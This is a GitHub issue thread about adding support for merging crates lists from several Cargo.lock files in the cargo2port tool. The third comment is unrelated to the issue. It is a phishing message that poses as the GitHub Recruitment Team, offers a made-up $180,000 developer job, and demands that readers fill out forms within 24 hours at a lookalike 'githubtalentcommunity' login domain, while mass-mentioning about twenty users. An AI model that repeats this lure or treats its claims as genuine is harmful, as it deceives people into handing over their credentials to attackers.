### ISSUE TITLE
Create a merged `crates` list from multiple `Cargo.lock` files

### ISSUE THREAD

**Issue by halostatue** [l2dy/cargo2port#2]
When working with updating the rust port, it appears necessary to have a single merged `crates` list based on both `./Cargo.lock` and `./bootstrap/Cargo.lock`. It is possible to paste these together and sort them, but it would be useful if we could run `cargo2port Cargo.lock bootstrap/Cargo.lock`.

**Comment by l2dy** [comment]
It might take quite a while until I have time to implement this. In the meantime, PRs are welcome.

**Comment by AntonioSalazar** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Ginobilium, @NotTendrix, @huan-xi, @gakiyuibo, @SGT-Vasquez, @SJS-dev, @ser6iy, @nickplee, @adeliktas, @mofang1104, @glennwbaker, @Rams1401, @partrick, @system-overflow, @yanto180681, @xirtam-ch, @ajuroshan, @morimolymoly, @sabrodigan, @KARTHIKPIKA
